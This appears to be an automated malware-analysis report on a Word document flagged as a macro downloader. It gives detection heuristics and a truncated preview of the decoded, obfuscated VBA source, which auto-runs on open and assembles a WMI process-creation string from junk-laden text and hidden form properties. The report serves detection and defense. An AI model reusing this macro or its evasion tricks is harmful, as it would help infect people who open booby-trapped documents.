MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains VBA macros, including a Document_Open macro and a hidden-property command stager, which are indicative of a downloader. The ClamAV detection 'Doc.Downloader.Generic-9393258-0' further supports this. The macro's primary function appears to be executing a secondary payload, likely downloaded from an external source, although the specific download URL is not directly extractable from the provided script excerpts.
Heuristics 7
-
ClamAV: Doc.Downloader.Generic-9393258-0 critical CLAMAV_DETECTION — ClamAV detected this file as malware: Doc.Downloader.Generic-9393258-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROS — Document contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER — VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
-
Document_Open macro high OLE_VBA_DOCOPEN — Document_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJ — CreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC — Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body). This is the standard DrawingML schema namespace identifier present in ordinary Office documents, consistent with its "document body" channel label rather than a URL reached by the macro.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15345 bytes |

SHA-256: df93d4b3826c1017fc128f5aa2871fa3fab73632b619dd8b1084750b2268cb3a
Preview script — first 1,000 lines of the extracted script
' Module header emitted by olevba for the first extracted module.
' VB_Base = "1Normal.ThisDocument" marks this as the document's ThisDocument
' module (the one whose Document_Open handler Word runs on open); the
' VB_Name is an obfuscated random-looking identifier rather than the default.
Attribute VB_Name = "Y3gsywhtb_d7p"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-exec entry point: Word invokes Document_Open when the document is
' opened (VBA names are case-insensitive, so "Document_open" matches).
' It does nothing itself except hand off to Qcro14kf1lpyj in the second
' module, Clqci_avqs5t7t2yg0, where the actual work happens.
' Note the "Private Sub _" line continuation: the procedure header is split
' across two lines, so a naive single-line text search for
' "Sub Document_Open" would miss this handler.
Private Sub _
Document_open()
Clqci_avqs5t7t2yg0.Qcro14kf1lpyj
End Sub
' Module header for the second extracted module, Clqci_avqs5t7t2yg0.
' The VB_Base value of two GUIDs (instead of a ThisDocument base) is the form
' olevba emits for a UserForm-backed module — presumably this is the hidden
' UserForm whose properties (e.g. .HelpContextId, read in Qcro14kf1lpyj
' below) carry pieces of the command text; confirm against the form stream.
Attribute VB_Name = "Clqci_avqs5t7t2yg0"
Attribute VB_Base = "0{B0836D73-CF05-4B6B-AB78-0DCCAF1D15A6}{7705F601-4322-4493-A495-1E3B221F7C36}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Qcro14kf1lpyj()
Djhh8t24ym6mcsh_f4 = "370"
If Len("Gr9r2v0yqeyno_dU45offxs2zpn77d") = Len("T38sh4qx07ly__") + 1 Then End
If Len("I07pglpod5q2bgUubhwxdvoamhqk5N3idoar8fmn4y3bpqm") < Len("Tx4o5inso5e") Then
MsgBox "Cj79_5di3debjjk8x0" + "Tdgdl1no6atddbnku4"
MsgBox ("Bvnemyt2eu0q6p8n7")
MsgBox "Euhwqjhjaba7_2e48n" + "Y6p40i58uyygzr"
End If
If Len("Jjxrfd9dys2jvIctt09c22inw") = Len("Qvm6loxo6fpil") Then
MsgBox "T3ki_jzivfy" + "Okwsodu2kslyp695"
MsgBox ("Xdly8l0ranmypa !!!")
MsgBox "Ev6n3n3lyu2k" + "Q4fm72ycmcy0xb"
End If
Zgxksm1n993co = Clqci_avqs5t7t2yg0.HelpContextId + 50 + 50
Dshlgfawm4f9 = "516"
If Len("Tggyjigykdi0c55ftM_ejdkfzyluxmw85") = Len("Dtmiz0t6o0melhq4d") + 1 Then End
If Len("Yzsc8svv6ey3wcicQhr3avo1l4umed6iYfjcw5yeephxmj8is5") < Len("Q99ddmvzai1a5tz") Then
MsgBox "C4wao4y8ghd" + "Oydwkjw_bbg1bfx7oo"
MsgBox ("Cyf4p74g5ka98j")
MsgBox "Dmfd2u8zcbx8_jf3" + "U5_lo7y2rd31aek"
End If
If Len("K_l2kx6h0c24_5Rstfdjl3rrnkrf_c9n") = Len("Pj6bhe04nle72x") Then
MsgBox "Chs0ghdi6k8m" + "B_a4puiy5rlber"
MsgBox ("Lmvxxla3v_gisb_3k3 !!!")
MsgBox "Sollqgpsk2g8c1e" + "Nzk1cbhp5jm2x51aj"
End If
Srfsgbmr4szcw7 = ChrW(Zgxksm1n993co + (15))
E_coit9wu0j_ipuu4w = "918"
If Len("Mgwko_72balseogrv8K_xi8kbg3mwk") = Len("Tmf5v1ypn37vjre") + 1 Then End
If Len("B90xxha69z_n4doT224im86j2bh3yV8v1pxx9uml771kw") < Len("Jq6t2mo1aeo8g") Then
MsgBox "Ckbgrio_4d5gq8raf" + "D45m5edug_otjaotiw"
MsgBox ("O5o7ox2zu7sja0q4o")
MsgBox "Tr8c8covk6449y6gve" + "Xqzcptyz2ou4iats"
End If
If Len("Yr8mr4n88205Volcruborujnyh") = Len("Av4og1iehoqxmgt4") Then
MsgBox "Wmugsgt_q2q9y05v" + "Wl0uyzvkeyb8zh92"
MsgBox ("Nmyutpjo2_4gtqw !!!")
MsgBox "Smi5fhy08os" + "C2utgfps9dl7zg"
End If
Blswr4yymtv620 = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + Srfsgbmr4szcw7 + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Clqci_avqs5t7t2yg0.Q9usvrg1lo8fi2l4s5 + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf"
V9ktdghk2m7o3pb1t6 = "783"
If Len("Pzdi3r2y8l6h6Gemzx1xd4rp4p") = Len("Ibd2u5ni21scmt") + 1 Then End
If Len("Z8ebbtk1b7f1tQ40bjm6hdxa_aoxgunU4uk3o0amc6") < Len("C5me9tbcgq34ra") Then
MsgBox "N8c6m4w2dcs" + "Qllsfji8fzj1"
MsgBox ("Nk9mb242mpekhsws")
MsgBox "Gbpmo369xuj" + "X6xni5sypcl"
End If
If Len("Mk7hi92xpcqiklesKphuxqvr9_z") = Len("Vyg116d8x1z") Then
MsgBox "Pz6opc8zawaxee56k" + "H0ctvojtuqbwqz1o"
MsgBox ("Ywgc6cadixtwwbjw8p !!!")
MsgBox "Tdeqe7sryogm91g6" + "Czq8bqm2290o"
End If
Pqh8x6ldbjbza8 = Z16pyvooaxdvtdye(Blswr4yymtv620)
F3tmkf0icqyh6tr = "770"
If Len("Lhy5df9qz7t_9Hj906d6k44dd0yo") = Len("G3in5irhrc5cy")
... (truncated)